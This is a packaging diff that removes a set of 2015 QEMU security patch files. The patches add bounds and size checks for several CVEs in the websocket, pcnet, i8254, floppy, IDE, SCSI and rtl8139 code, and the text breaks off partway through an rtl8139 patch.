MISC metadata.xml 3748 SHA256 ddc383b4236e3fb213427aa985f9d42b0b701675b6085fc3f8f6eecac4fd317f SHA512 ace8bf0729123df50dcb01fff5012302ffccf2b43876684c5c739fde865586ec1586d444691a6024e37fbfaba014f211fad01bc6d301ea09aa78ecf3b8c96684 WHIRLPOOL 4c54da70dc2319a49fca73e81ac796464d57b5c78cdb18d7b0f84c58bb3942f805f649bf9d142293dee0c1706e087cc601c10887133637df2678bec91b8d25dc MISC metadata.xml 3925 SHA256 d1c219b7da0cbf77919cd1e055acbb3f6788a574fd802c98a43c89a411697b36 SHA512 3ff45d1c8ede12b4eedc7d01f39777b76a1cbd0ba9364299dec99d4b4a05cade5784d6f6e50197d5b5ae1f1b8e831c49da195eb53263c49b7d16aec8ee28b6e6 WHIRLPOOL bc25783fac0f3f13318834cc535404af9af20de16c7aeec222e59dc2ed7740ac5e767b329a5bcd6356d0cbae2428e278515f1446aa8ecb87a873bf4dbe04bf41


@ -1,241 +0,0 @@
From a2bebfd6e09d285aa793cae3fb0fc3a39a9fee6e Mon Sep 17 00:00:00 2001
From: "Daniel P. Berrange" <berrange@redhat.com>
Date: Mon, 23 Mar 2015 22:58:21 +0000
Subject: [PATCH] CVE-2015-1779: incrementally decode websocket frames
The logic for decoding websocket frames wants to fully
decode the frame header and payload, before allowing the
VNC server to see any of the payload data. There is no
size limit on websocket payloads, so this allows a
malicious network client to consume 2^64 bytes in memory
in QEMU. It can trigger this denial of service before
the VNC server even performs any authentication.
The fix is to decode the header, and then incrementally
decode the payload data as it is needed. With this fix
the websocket decoder will allow at most 4k of data to
be buffered before decoding and processing payload.
Signed-off-by: Daniel P. Berrange <berrange@redhat.com>
[ kraxel: fix frequent spurious disconnects, suggested by Peter Maydell ]
@@ -361,7 +361,7 @@ int vncws_decode_frame_payload(Buffer *input,
- *payload_size = input->offset;
+ *payload_size = *payload_remain;
[ kraxel: fix 32bit build ]
@@ -306,7 +306,7 @@ struct VncState
- uint64_t ws_payload_remain;
+ size_t ws_payload_remain;
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
ui/vnc-ws.c | 105 ++++++++++++++++++++++++++++++++++++++++--------------------
ui/vnc-ws.h | 9 ++++--
ui/vnc.h | 2 ++
3 files changed, 80 insertions(+), 36 deletions(-)
diff --git a/ui/vnc-ws.c b/ui/vnc-ws.c
index 85dbb7e..0b7de4e 100644
--- a/ui/vnc-ws.c
+++ b/ui/vnc-ws.c
@@ -107,7 +107,7 @@ long vnc_client_read_ws(VncState *vs)
{
int ret, err;
uint8_t *payload;
- size_t payload_size, frame_size;
+ size_t payload_size, header_size;
VNC_DEBUG("Read websocket %p size %zd offset %zd\n", vs->ws_input.buffer,
vs->ws_input.capacity, vs->ws_input.offset);
buffer_reserve(&vs->ws_input, 4096);
@@ -117,18 +117,39 @@ long vnc_client_read_ws(VncState *vs)
}
vs->ws_input.offset += ret;
- /* make sure that nothing is left in the ws_input buffer */
+ ret = 0;
+ /* consume as much of ws_input buffer as possible */
do {
- err = vncws_decode_frame(&vs->ws_input, &payload,
- &payload_size, &frame_size);
- if (err <= 0) {
- return err;
+ if (vs->ws_payload_remain == 0) {
+ err = vncws_decode_frame_header(&vs->ws_input,
+ &header_size,
+ &vs->ws_payload_remain,
+ &vs->ws_payload_mask);
+ if (err <= 0) {
+ return err;
+ }
+
+ buffer_advance(&vs->ws_input, header_size);
}
+ if (vs->ws_payload_remain != 0) {
+ err = vncws_decode_frame_payload(&vs->ws_input,
+ &vs->ws_payload_remain,
+ &vs->ws_payload_mask,
+ &payload,
+ &payload_size);
+ if (err < 0) {
+ return err;
+ }
+ if (err == 0) {
+ return ret;
+ }
+ ret += err;
- buffer_reserve(&vs->input, payload_size);
- buffer_append(&vs->input, payload, payload_size);
+ buffer_reserve(&vs->input, payload_size);
+ buffer_append(&vs->input, payload, payload_size);
- buffer_advance(&vs->ws_input, frame_size);
+ buffer_advance(&vs->ws_input, payload_size);
+ }
} while (vs->ws_input.offset > 0);
return ret;
@@ -265,15 +286,14 @@ void vncws_encode_frame(Buffer *output, const void *payload,
buffer_append(output, payload, payload_size);
}
-int vncws_decode_frame(Buffer *input, uint8_t **payload,
- size_t *payload_size, size_t *frame_size)
+int vncws_decode_frame_header(Buffer *input,
+ size_t *header_size,
+ size_t *payload_remain,
+ WsMask *payload_mask)
{
unsigned char opcode = 0, fin = 0, has_mask = 0;
- size_t header_size = 0;
- uint32_t *payload32;
+ size_t payload_len;
WsHeader *header = (WsHeader *)input->buffer;
- WsMask mask;
- int i;
if (input->offset < WS_HEAD_MIN_LEN + 4) {
/* header not complete */
@@ -283,7 +303,7 @@ int vncws_decode_frame(Buffer *input, uint8_t **payload,
fin = (header->b0 & 0x80) >> 7;
opcode = header->b0 & 0x0f;
has_mask = (header->b1 & 0x80) >> 7;
- *payload_size = header->b1 & 0x7f;
+ payload_len = header->b1 & 0x7f;
if (opcode == WS_OPCODE_CLOSE) {
/* disconnect */
@@ -300,40 +320,57 @@ int vncws_decode_frame(Buffer *input, uint8_t **payload,
return -2;
}
- if (*payload_size < 126) {
- header_size = 6;
- mask = header->u.m;
- } else if (*payload_size == 126 && input->offset >= 8) {
- *payload_size = be16_to_cpu(header->u.s16.l16);
- header_size = 8;
- mask = header->u.s16.m16;
- } else if (*payload_size == 127 && input->offset >= 14) {
- *payload_size = be64_to_cpu(header->u.s64.l64);
- header_size = 14;
- mask = header->u.s64.m64;
+ if (payload_len < 126) {
+ *payload_remain = payload_len;
+ *header_size = 6;
+ *payload_mask = header->u.m;
+ } else if (payload_len == 126 && input->offset >= 8) {
+ *payload_remain = be16_to_cpu(header->u.s16.l16);
+ *header_size = 8;
+ *payload_mask = header->u.s16.m16;
+ } else if (payload_len == 127 && input->offset >= 14) {
+ *payload_remain = be64_to_cpu(header->u.s64.l64);
+ *header_size = 14;
+ *payload_mask = header->u.s64.m64;
} else {
/* header not complete */
return 0;
}
- *frame_size = header_size + *payload_size;
+ return 1;
+}
+
+int vncws_decode_frame_payload(Buffer *input,
+ size_t *payload_remain, WsMask *payload_mask,
+ uint8_t **payload, size_t *payload_size)
+{
+ size_t i;
+ uint32_t *payload32;
- if (input->offset < *frame_size) {
- /* frame not complete */
+ *payload = input->buffer;
+ /* If we aren't at the end of the payload, then drop
+ * off the last bytes, so we're always multiple of 4
+ * for purpose of unmasking, except at end of payload
+ */
+ if (input->offset < *payload_remain) {
+ *payload_size = input->offset - (input->offset % 4);
+ } else {
+ *payload_size = *payload_remain;
+ }
+ if (*payload_size == 0) {
return 0;
}
-
- *payload = input->buffer + header_size;
+ *payload_remain -= *payload_size;
/* unmask frame */
/* process 1 frame (32 bit op) */
payload32 = (uint32_t *)(*payload);
for (i = 0; i < *payload_size / 4; i++) {
- payload32[i] ^= mask.u;
+ payload32[i] ^= payload_mask->u;
}
/* process the remaining bytes (if any) */
for (i *= 4; i < *payload_size; i++) {
- (*payload)[i] ^= mask.c[i % 4];
+ (*payload)[i] ^= payload_mask->c[i % 4];
}
return 1;
diff --git a/ui/vnc-ws.h b/ui/vnc-ws.h
index ef229b7..14d4230 100644
--- a/ui/vnc-ws.h
+++ b/ui/vnc-ws.h
@@ -83,7 +83,12 @@ long vnc_client_read_ws(VncState *vs);
void vncws_process_handshake(VncState *vs, uint8_t *line, size_t size);
void vncws_encode_frame(Buffer *output, const void *payload,
const size_t payload_size);
-int vncws_decode_frame(Buffer *input, uint8_t **payload,
- size_t *payload_size, size_t *frame_size);
+int vncws_decode_frame_header(Buffer *input,
+ size_t *header_size,
+ size_t *payload_remain,
+ WsMask *payload_mask);
+int vncws_decode_frame_payload(Buffer *input,
+ size_t *payload_remain, WsMask *payload_mask,
+ uint8_t **payload, size_t *payload_size);
#endif /* __QEMU_UI_VNC_WS_H */
diff --git a/ui/vnc.h b/ui/vnc.h
index e19ac39..3f7c6a9 100644
--- a/ui/vnc.h
+++ b/ui/vnc.h
@@ -306,6 +306,8 @@ struct VncState
#ifdef CONFIG_VNC_WS
Buffer ws_input;
Buffer ws_output;
+ size_t ws_payload_remain;
+ WsMask ws_payload_mask;
#endif
/* current output mode information */
VncWritePixels *write_pixels;
--
2.3.5


@ -1,58 +0,0 @@
From 2cdb5e142fb93e875fa53c52864ef5eb8d5d8b41 Mon Sep 17 00:00:00 2001
From: "Daniel P. Berrange" <berrange@redhat.com>
Date: Mon, 23 Mar 2015 22:58:22 +0000
Subject: [PATCH] CVE-2015-1779: limit size of HTTP headers from websockets
clients
The VNC server websockets decoder will read and buffer data from
websockets clients until it sees the end of the HTTP headers,
as indicated by \r\n\r\n. In theory this allows a malicious to
trick QEMU into consuming an arbitrary amount of RAM. In practice,
because QEMU runs g_strstr_len() across the buffered header data,
it will spend increasingly long burning CPU time searching for
the substring match and less & less time reading data. So while
this does cause arbitrary memory growth, the bigger problem is
that QEMU will be burning 100% of available CPU time.
A novnc websockets client typically sends headers of around
512 bytes in length. As such it is reasonable to place a 4096
byte limit on the amount of data buffered while searching for
the end of HTTP headers.
Signed-off-by: Daniel P. Berrange <berrange@redhat.com>
Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
---
ui/vnc-ws.c | 10 ++++++++--
1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/ui/vnc-ws.c b/ui/vnc-ws.c
index 0b7de4e..62eb97f 100644
--- a/ui/vnc-ws.c
+++ b/ui/vnc-ws.c
@@ -81,8 +81,11 @@ void vncws_handshake_read(void *opaque)
VncState *vs = opaque;
uint8_t *handshake_end;
long ret;
- buffer_reserve(&vs->ws_input, 4096);
- ret = vnc_client_read_buf(vs, buffer_end(&vs->ws_input), 4096);
+ /* Typical HTTP headers from novnc are 512 bytes, so limiting
+ * total header size to 4096 is easily enough. */
+ size_t want = 4096 - vs->ws_input.offset;
+ buffer_reserve(&vs->ws_input, want);
+ ret = vnc_client_read_buf(vs, buffer_end(&vs->ws_input), want);
if (!ret) {
if (vs->csock == -1) {
@@ -99,6 +102,9 @@ void vncws_handshake_read(void *opaque)
vncws_process_handshake(vs, vs->ws_input.buffer, vs->ws_input.offset);
buffer_advance(&vs->ws_input, handshake_end - vs->ws_input.buffer +
strlen(WS_HANDSHAKE_END));
+ } else if (vs->ws_input.offset >= 4096) {
+ VNC_DEBUG("End of headers not found in first 4096 bytes\n");
+ vnc_client_error(vs);
}
}
--
2.3.5


@ -1,51 +0,0 @@
https://bugs.gentoo.org/551752
From 9f7c594c006289ad41169b854d70f5da6e400a2a Mon Sep 17 00:00:00 2001
From: Petr Matousek <pmatouse@redhat.com>
Date: Sun, 24 May 2015 10:53:44 +0200
Subject: [PATCH] pcnet: force the buffer access to be in bounds during tx
4096 is the maximum length per TMD and it is also currently the size of
the relay buffer pcnet driver uses for sending the packet data to QEMU
for further processing. With packet spanning multiple TMDs it can
happen that the overall packet size will be bigger than sizeof(buffer),
which results in memory corruption.
Fix this by only allowing to queue maximum sizeof(buffer) bytes.
This is CVE-2015-3209.
[Fixed 3-space indentation to QEMU's 4-space coding standard.
--Stefan]
Signed-off-by: Petr Matousek <pmatouse@redhat.com>
Reported-by: Matt Tait <matttait@google.com>
Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/pcnet.c | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
index bdfd38f..68b9981 100644
--- a/hw/net/pcnet.c
+++ b/hw/net/pcnet.c
@@ -1241,6 +1241,14 @@ static void pcnet_transmit(PCNetState *s)
}
bcnt = 4096 - GET_FIELD(tmd.length, TMDL, BCNT);
+
+ /* if multi-tmd packet outsizes s->buffer then skip it silently.
+ Note: this is not what real hw does */
+ if (s->xmit_pos + bcnt > sizeof(s->buffer)) {
+ s->xmit_pos = -1;
+ goto txdone;
+ }
+
s->phys_mem_read(s->dma_opaque, PHYSADDR(s, tmd.tbadr),
s->buffer + s->xmit_pos, bcnt, CSR_BSWP(s));
s->xmit_pos += bcnt;
--
2.2.0.rc0.207.ga3a616c


@ -1,41 +0,0 @@
From: Petr Matousek <pmatouse@redhat.com>
Date: Wed, 17 Jun 2015 10:46:11 +0000 (+0200)
Subject: i8254: fix out-of-bounds memory access in pit_ioport_read()
X-Git-Tag: v2.4.0-rc0~43^2~9
X-Git-Url: http://git.qemu.org/?p=qemu.git;a=commitdiff_plain;h=d4862a87e31a51de9eb260f25c9e99a75efe3235;hp=9dacf32d2cbd66cbcce7944ebdfd6b2df20e33b8
i8254: fix out-of-bounds memory access in pit_ioport_read()
Due converting PIO to the new memory read/write api we no longer provide
separate I/O region lenghts for read and write operations. As a result,
reading from PIT Mode/Command register will end with accessing
pit->channels with invalid index.
Fix this by ignoring read from the Mode/Command register.
This is CVE-2015-3214.
Reported-by: Matt Tait <matttait@google.com>
Fixes: 0505bcdec8228d8de39ab1a02644e71999e7c052
Cc: qemu-stable@nongnu.org
Signed-off-by: Petr Matousek <pmatouse@redhat.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
---
diff --git a/hw/timer/i8254.c b/hw/timer/i8254.c
index 3450c98..9b65a33 100644
--- a/hw/timer/i8254.c
+++ b/hw/timer/i8254.c
@@ -196,6 +196,12 @@ static uint64_t pit_ioport_read(void *opaque, hwaddr addr,
PITChannelState *s;
addr &= 3;
+
+ if (addr == 3) {
+ /* Mode/Command register is write only, read is ignored */
+ return 0;
+ }
+
s = &pit->channels[addr];
if (s->status_latched) {
s->status_latched = 0;


@ -1,86 +0,0 @@
https://bugs.gentoo.org/549404
From e907746266721f305d67bc0718795fedee2e824c Mon Sep 17 00:00:00 2001
From: Petr Matousek <pmatouse@redhat.com>
Date: Wed, 6 May 2015 09:48:59 +0200
Subject: [PATCH] fdc: force the fifo access to be in bounds of the allocated buffer
During processing of certain commands such as FD_CMD_READ_ID and
FD_CMD_DRIVE_SPECIFICATION_COMMAND the fifo memory access could
get out of bounds leading to memory corruption with values coming
from the guest.
Fix this by making sure that the index is always bounded by the
allocated memory.
This is CVE-2015-3456.
Signed-off-by: Petr Matousek <pmatouse@redhat.com>
Reviewed-by: John Snow <jsnow@redhat.com>
Signed-off-by: John Snow <jsnow@redhat.com>
---
hw/block/fdc.c | 17 +++++++++++------
1 files changed, 11 insertions(+), 6 deletions(-)
diff --git a/hw/block/fdc.c b/hw/block/fdc.c
index f72a392..d8a8edd 100644
--- a/hw/block/fdc.c
+++ b/hw/block/fdc.c
@@ -1497,7 +1497,7 @@ static uint32_t fdctrl_read_data(FDCtrl *fdctrl)
{
FDrive *cur_drv;
uint32_t retval = 0;
- int pos;
+ uint32_t pos;
cur_drv = get_cur_drv(fdctrl);
fdctrl->dsr &= ~FD_DSR_PWRDOWN;
@@ -1506,8 +1506,8 @@ static uint32_t fdctrl_read_data(FDCtrl *fdctrl)
return 0;
}
pos = fdctrl->data_pos;
+ pos %= FD_SECTOR_LEN;
if (fdctrl->msr & FD_MSR_NONDMA) {
- pos %= FD_SECTOR_LEN;
if (pos == 0) {
if (fdctrl->data_pos != 0)
if (!fdctrl_seek_to_next_sect(fdctrl, cur_drv)) {
@@ -1852,10 +1852,13 @@ static void fdctrl_handle_option(FDCtrl *fdctrl, int direction)
static void fdctrl_handle_drive_specification_command(FDCtrl *fdctrl, int direction)
{
FDrive *cur_drv = get_cur_drv(fdctrl);
+ uint32_t pos;
- if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x80) {
+ pos = fdctrl->data_pos - 1;
+ pos %= FD_SECTOR_LEN;
+ if (fdctrl->fifo[pos] & 0x80) {
/* Command parameters done */
- if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x40) {
+ if (fdctrl->fifo[pos] & 0x40) {
fdctrl->fifo[0] = fdctrl->fifo[1];
fdctrl->fifo[2] = 0;
fdctrl->fifo[3] = 0;
@@ -1955,7 +1958,7 @@ static uint8_t command_to_handler[256];
static void fdctrl_write_data(FDCtrl *fdctrl, uint32_t value)
{
FDrive *cur_drv;
- int pos;
+ uint32_t pos;
/* Reset mode */
if (!(fdctrl->dor & FD_DOR_nRESET)) {
@@ -2004,7 +2007,9 @@ static void fdctrl_write_data(FDCtrl *fdctrl, uint32_t value)
}
FLOPPY_DPRINTF("%s: %02x\n", __func__, value);
- fdctrl->fifo[fdctrl->data_pos++] = value;
+ pos = fdctrl->data_pos++;
+ pos %= FD_SECTOR_LEN;
+ fdctrl->fifo[pos] = value;
if (fdctrl->data_pos == fdctrl->data_len) {
/* We now have all parameters
* and will be able to treat the command
--
1.7.0.4


@ -1,75 +0,0 @@
From d2ff85854512574e7209f295e87b0835d5b032c6 Mon Sep 17 00:00:00 2001
From: Kevin Wolf <kwolf@redhat.com>
Date: Sun, 26 Jul 2015 23:42:53 -0400
Subject: [PATCH] ide: Check array bounds before writing to io_buffer
(CVE-2015-5154)
If the end_transfer_func of a command is called because enough data has
been read or written for the current PIO transfer, and it fails to
correctly call the command completion functions, the DRQ bit in the
status register and s->end_transfer_func may remain set. This allows the
guest to access further bytes in s->io_buffer beyond s->data_end, and
eventually overflowing the io_buffer.
One case where this currently happens is emulation of the ATAPI command
START STOP UNIT.
This patch fixes the problem by adding explicit array bounds checks
before accessing the buffer instead of relying on end_transfer_func to
function correctly.
Cc: qemu-stable@nongnu.org
Signed-off-by: Kevin Wolf <kwolf@redhat.com>
Reviewed-by: John Snow <jsnow@redhat.com>
---
hw/ide/core.c | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
diff --git a/hw/ide/core.c b/hw/ide/core.c
index 122e955..44fcc23 100644
--- a/hw/ide/core.c
+++ b/hw/ide/core.c
@@ -2021,6 +2021,10 @@ void ide_data_writew(void *opaque, uint32_t addr, uint32_t val)
}
p = s->data_ptr;
+ if (p + 2 > s->data_end) {
+ return;
+ }
+
*(uint16_t *)p = le16_to_cpu(val);
p += 2;
s->data_ptr = p;
@@ -2042,6 +2046,10 @@ uint32_t ide_data_readw(void *opaque, uint32_t addr)
}
p = s->data_ptr;
+ if (p + 2 > s->data_end) {
+ return 0;
+ }
+
ret = cpu_to_le16(*(uint16_t *)p);
p += 2;
s->data_ptr = p;
@@ -2063,6 +2071,10 @@ void ide_data_writel(void *opaque, uint32_t addr, uint32_t val)
}
p = s->data_ptr;
+ if (p + 4 > s->data_end) {
+ return;
+ }
+
*(uint32_t *)p = le32_to_cpu(val);
p += 4;
s->data_ptr = p;
@@ -2084,6 +2096,10 @@ uint32_t ide_data_readl(void *opaque, uint32_t addr)
}
p = s->data_ptr;
+ if (p + 4 > s->data_end) {
+ return 0;
+ }
+
ret = cpu_to_le32(*(uint32_t *)p);
p += 4;
s->data_ptr = p;


@ -1,26 +0,0 @@
From 03441c3a4a42beb25460dd11592539030337d0f8 Mon Sep 17 00:00:00 2001
From: Kevin Wolf <kwolf@redhat.com>
Date: Sun, 26 Jul 2015 23:42:53 -0400
Subject: [PATCH] ide/atapi: Fix START STOP UNIT command completion
The command must be completed on all code paths. START STOP UNIT with
pwrcnd set should succeed without doing anything.
Signed-off-by: Kevin Wolf <kwolf@redhat.com>
Reviewed-by: John Snow <jsnow@redhat.com>
---
hw/ide/atapi.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c
index 950e311..79dd167 100644
--- a/hw/ide/atapi.c
+++ b/hw/ide/atapi.c
@@ -983,6 +983,7 @@ static void cmd_start_stop_unit(IDEState *s, uint8_t* buf)
if (pwrcnd) {
/* eject/load only happens for power condition == 0 */
+ ide_atapi_cmd_ok(s);
return;
}


@ -1,69 +0,0 @@
From cb72cba83021fa42719e73a5249c12096a4d1cfc Mon Sep 17 00:00:00 2001
From: Kevin Wolf <kwolf@redhat.com>
Date: Sun, 26 Jul 2015 23:42:53 -0400
Subject: [PATCH] ide: Clear DRQ after handling all expected accesses
This is additional hardening against an end_transfer_func that fails to
clear the DRQ status bit. The bit must be unset as soon as the PIO
transfer has completed, so it's better to do this in a central place
instead of duplicating the code in all commands (and forgetting it in
some).
Signed-off-by: Kevin Wolf <kwolf@redhat.com>
Reviewed-by: John Snow <jsnow@redhat.com>
---
hw/ide/core.c | 16 ++++++++++++----
1 file changed, 12 insertions(+), 4 deletions(-)
diff --git a/hw/ide/core.c b/hw/ide/core.c
index 44fcc23..50449ca 100644
--- a/hw/ide/core.c
+++ b/hw/ide/core.c
@@ -2028,8 +2028,10 @@ void ide_data_writew(void *opaque, uint32_t addr, uint32_t val)
*(uint16_t *)p = le16_to_cpu(val);
p += 2;
s->data_ptr = p;
- if (p >= s->data_end)
+ if (p >= s->data_end) {
+ s->status &= ~DRQ_STAT;
s->end_transfer_func(s);
+ }
}
uint32_t ide_data_readw(void *opaque, uint32_t addr)
@@ -2053,8 +2055,10 @@ uint32_t ide_data_readw(void *opaque, uint32_t addr)
ret = cpu_to_le16(*(uint16_t *)p);
p += 2;
s->data_ptr = p;
- if (p >= s->data_end)
+ if (p >= s->data_end) {
+ s->status &= ~DRQ_STAT;
s->end_transfer_func(s);
+ }
return ret;
}
@@ -2078,8 +2082,10 @@ void ide_data_writel(void *opaque, uint32_t addr, uint32_t val)
*(uint32_t *)p = le32_to_cpu(val);
p += 4;
s->data_ptr = p;
- if (p >= s->data_end)
+ if (p >= s->data_end) {
+ s->status &= ~DRQ_STAT;
s->end_transfer_func(s);
+ }
}
uint32_t ide_data_readl(void *opaque, uint32_t addr)
@@ -2103,8 +2109,10 @@ uint32_t ide_data_readl(void *opaque, uint32_t addr)
ret = cpu_to_le32(*(uint32_t *)p);
p += 4;
s->data_ptr = p;
- if (p >= s->data_end)
+ if (p >= s->data_end) {
+ s->status &= ~DRQ_STAT;
s->end_transfer_func(s);
+ }
return ret;
}


@ -1,40 +0,0 @@
commit c170aad8b057223b1139d72e5ce7acceafab4fa9
Author: Paolo Bonzini <pbonzini@redhat.com>
Date: Tue Jul 21 08:59:39 2015 +0200
scsi: fix buffer overflow in scsi_req_parse_cdb (CVE-2015-5158)
This is a guest-triggerable buffer overflow present in QEMU 2.2.0
and newer. scsi_cdb_length returns -1 as an error value, but the
caller does not check it.
Luckily, the massive overflow means that QEMU will just SIGSEGV,
making the impact much smaller.
Reported-by: Zhu Donghai (朱东海) <donghai.zdh@alibaba-inc.com>
Fixes: 1894df02811f6b79ea3ffbf1084599d96f316173
Reviewed-by: Fam Zheng <famz@redhat.com>
Cc: qemu-stable@nongnu.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
diff --git a/hw/scsi/scsi-bus.c b/hw/scsi/scsi-bus.c
index f50b2f0..f0ae462 100644
--- a/hw/scsi/scsi-bus.c
+++ b/hw/scsi/scsi-bus.c
@@ -1239,10 +1239,15 @@ int scsi_cdb_length(uint8_t *buf) {
int scsi_req_parse_cdb(SCSIDevice *dev, SCSICommand *cmd, uint8_t *buf)
{
int rc;
+ int len;
cmd->lba = -1;
- cmd->len = scsi_cdb_length(buf);
+ len = scsi_cdb_length(buf);
+ if (len < 0) {
+ return -1;
+ }
+ cmd->len = len;
switch (dev->type) {
case TYPE_TAPE:
rc = scsi_req_stream_xfer(cmd, dev, buf);


@ -1,82 +0,0 @@
From 5e0c290415b9d57077a86e70c8e6a058868334d3 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:16:58 +0100
Subject: [PATCH 1/7] rtl8139: avoid nested ifs in IP header parsing
Transmit offload needs to parse packet headers. If header fields have
unexpected values the offload processing is skipped.
The code currently uses nested ifs because there is relatively little
input validation. The next patches will add missing input validation
and a goto label is more appropriate to avoid deep if statement nesting.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 41 ++++++++++++++++++++++-------------------
1 file changed, 22 insertions(+), 19 deletions(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index 5f0197c..91ba33b 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2174,28 +2174,30 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
size_t eth_payload_len = 0;
int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12));
- if (proto == ETH_P_IP)
+ if (proto != ETH_P_IP)
{
- DPRINTF("+++ C+ mode has IP packet\n");
-
- /* not aligned */
- eth_payload_data = saved_buffer + ETH_HLEN;
- eth_payload_len = saved_size - ETH_HLEN;
-
- ip = (ip_header*)eth_payload_data;
-
- if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
- DPRINTF("+++ C+ mode packet has bad IP version %d "
- "expected %d\n", IP_HEADER_VERSION(ip),
- IP_HEADER_VERSION_4);
- ip = NULL;
- } else {
- hlen = IP_HEADER_LENGTH(ip);
- ip_protocol = ip->ip_p;
- ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
- }
+ goto skip_offload;
}
+ DPRINTF("+++ C+ mode has IP packet\n");
+
+ /* not aligned */
+ eth_payload_data = saved_buffer + ETH_HLEN;
+ eth_payload_len = saved_size - ETH_HLEN;
+
+ ip = (ip_header*)eth_payload_data;
+
+ if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
+ DPRINTF("+++ C+ mode packet has bad IP version %d "
+ "expected %d\n", IP_HEADER_VERSION(ip),
+ IP_HEADER_VERSION_4);
+ goto skip_offload;
+ }
+
+ hlen = IP_HEADER_LENGTH(ip);
+ ip_protocol = ip->ip_p;
+ ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
+
if (ip)
{
if (txdw0 & CP_TX_IPCS)
@@ -2391,6 +2393,7 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
}
}
+skip_offload:
/* update tally counter */
++s->tally_counters.TxOk;
--
2.1.4


@ -1,373 +0,0 @@
From 2d7d80e8dc160904fa7276cc05da26c062a50066 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:16:59 +0100
Subject: [PATCH 2/7] rtl8139: drop tautologous if (ip) {...} statement
The previous patch stopped using the ip pointer as an indicator that the
IP header is present. When we reach the if (ip) {...} statement we know
ip is always non-NULL.
Remove the if statement to reduce nesting.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 305 +++++++++++++++++++++++++++----------------------------
1 file changed, 151 insertions(+), 154 deletions(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index 91ba33b..2f12d42 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2198,198 +2198,195 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
ip_protocol = ip->ip_p;
ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
- if (ip)
+ if (txdw0 & CP_TX_IPCS)
{
- if (txdw0 & CP_TX_IPCS)
- {
- DPRINTF("+++ C+ mode need IP checksum\n");
+ DPRINTF("+++ C+ mode need IP checksum\n");
- if (hlen<sizeof(ip_header) || hlen>eth_payload_len) {/* min header length */
- /* bad packet header len */
- /* or packet too short */
- }
- else
- {
- ip->ip_sum = 0;
- ip->ip_sum = ip_checksum(ip, hlen);
- DPRINTF("+++ C+ mode IP header len=%d checksum=%04x\n",
- hlen, ip->ip_sum);
- }
+ if (hlen<sizeof(ip_header) || hlen>eth_payload_len) {/* min header length */
+ /* bad packet header len */
+ /* or packet too short */
}
-
- if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
+ else
{
- int large_send_mss = (txdw0 >> 16) & CP_TC_LGSEN_MSS_MASK;
+ ip->ip_sum = 0;
+ ip->ip_sum = ip_checksum(ip, hlen);
+ DPRINTF("+++ C+ mode IP header len=%d checksum=%04x\n",
+ hlen, ip->ip_sum);
+ }
+ }
- DPRINTF("+++ C+ mode offloaded task TSO MTU=%d IP data %d "
- "frame data %d specified MSS=%d\n", ETH_MTU,
- ip_data_len, saved_size - ETH_HLEN, large_send_mss);
+ if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
+ {
+ int large_send_mss = (txdw0 >> 16) & CP_TC_LGSEN_MSS_MASK;
- int tcp_send_offset = 0;
- int send_count = 0;
+ DPRINTF("+++ C+ mode offloaded task TSO MTU=%d IP data %d "
+ "frame data %d specified MSS=%d\n", ETH_MTU,
+ ip_data_len, saved_size - ETH_HLEN, large_send_mss);
- /* maximum IP header length is 60 bytes */
- uint8_t saved_ip_header[60];
+ int tcp_send_offset = 0;
+ int send_count = 0;
- /* save IP header template; data area is used in tcp checksum calculation */
- memcpy(saved_ip_header, eth_payload_data, hlen);
+ /* maximum IP header length is 60 bytes */
+ uint8_t saved_ip_header[60];
- /* a placeholder for checksum calculation routine in tcp case */
- uint8_t *data_to_checksum = eth_payload_data + hlen - 12;
- // size_t data_to_checksum_len = eth_payload_len - hlen + 12;
+ /* save IP header template; data area is used in tcp checksum calculation */
+ memcpy(saved_ip_header, eth_payload_data, hlen);
- /* pointer to TCP header */
- tcp_header *p_tcp_hdr = (tcp_header*)(eth_payload_data + hlen);
+ /* a placeholder for checksum calculation routine in tcp case */
+ uint8_t *data_to_checksum = eth_payload_data + hlen - 12;
+ // size_t data_to_checksum_len = eth_payload_len - hlen + 12;
- int tcp_hlen = TCP_HEADER_DATA_OFFSET(p_tcp_hdr);
+ /* pointer to TCP header */
+ tcp_header *p_tcp_hdr = (tcp_header*)(eth_payload_data + hlen);
- /* ETH_MTU = ip header len + tcp header len + payload */
- int tcp_data_len = ip_data_len - tcp_hlen;
- int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
+ int tcp_hlen = TCP_HEADER_DATA_OFFSET(p_tcp_hdr);
